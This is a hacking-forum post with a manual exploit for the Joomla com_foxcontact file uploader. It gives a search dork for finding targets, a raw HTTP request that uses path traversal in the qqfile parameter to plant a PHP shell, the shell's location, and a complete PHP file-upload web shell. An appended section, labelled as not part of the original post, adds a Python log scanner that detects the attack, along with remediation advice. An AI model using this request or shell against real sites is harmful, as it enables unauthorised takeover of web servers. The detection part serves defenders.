Exploit com_foxcontact upload shell

Joined Jan 19, 2017 | Credits 0 | Rating 0%
Manual Exploit com_foxcontact shell upload
We will use any header-injection tool.
I will use Burp Suite.
dork inurl:com_foxcontact

-HTTP Header Example-

POST http://127.0.0.1/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

<?php cmd or file upload ?>

############################

Shell path:

www.site.com/components/com_foxcontact/filename.php

###########################
my script upload :) :)

<?php
// Uploader script as posted: it writes an uploaded file to a path built from request input.
echo "<center>";
$files = @$_FILES["files"];

if ($files["name"] != '') {
    // Destination directory ("path") and file name both come straight from the client.
    $fullpath = $_REQUEST["path"] . $files["name"];
    if (move_uploaded_file($files['tmp_name'], $fullpath)) {
        echo "<h1><a href='$fullpath'>upload successful ^__^</a></h1>";
    }
}
echo '
<img src="http://www.sqorebda3.com/vb/Photo/new_1422333365_894.gif"> <br><br><br><br>
<html><head><title>file upload by sohaip-hackerDZ</title></head><body>
<style type="text/css">
body{
    background-color: #000000;
    font: bold;
    font-size: 20px;
}
b{
    color:#FF0000;
    font-size: 20px;
}
</style>
<b>file upload by sohaip-hackerDZ</b><br><br>

<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Upl0Ad"></form></body></html>';
echo "</center>";
?>

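For anyone on the defending side of the request shown above: the tell-tale signs are a POST to components/com_foxcontact/lib/file-uploader.php whose qqfile parameter contains traversal sequences and/or a server-side script extension. The following is an added example (not from the original post) that scans constructed access-log lines for exactly that pattern; the log lines, IP addresses and timestamps are made up for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [19/Jan/2017:10:01:02 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.6 - - [19/Jan/2017:10:02:03 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=12&mid=0&qqfile=cv.pdf HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.7 - - [19/Jan/2017:10:03:04 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=%2F..%2F..%2Fb.php HTTP/1.1" 200 57 "-" "Mozilla/5.0"
10.0.0.8 - - [19/Jan/2017:10:04:05 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOADER_PATH = "/components/com_foxcontact/lib/file-uploader.php"
SCRIPT_EXTS = (".php", ".phtml", ".php5", ".phar")


def classify(target):
    """Return the reasons a request target looks like abuse of the uploader (empty list if benign)."""
    parts = urlsplit(target)
    if not parts.path.endswith(UPLOADER_PATH):
        return []
    reasons = []
    qqfile = parse_qs(parts.query).get("qqfile", [""])[0]
    # parse_qs already decodes once; decode again to catch double-encoded sequences.
    name = unquote(qqfile)
    if ".." in name or name.startswith(("/", "\\")) or "\\" in name:
        reasons.append("path traversal in qqfile")
    if name.lower().endswith(SCRIPT_EXTS):
        reasons.append("server-side script extension in qqfile")
    return reasons


def scan(log_text):
    """Yield (ip, timestamp, status, reasons) for every suspicious uploader request in the log."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("ts"), m.group("status"), reasons))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged request is the cue to check the web root for newly written .php files; the lasting fix is for the upload handler to generate its own file name and reject anything outside the intended upload directory.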
Joined Dec 19, 2016 | Credits 9 | Rating 0%
WHY?
error: File is too large.
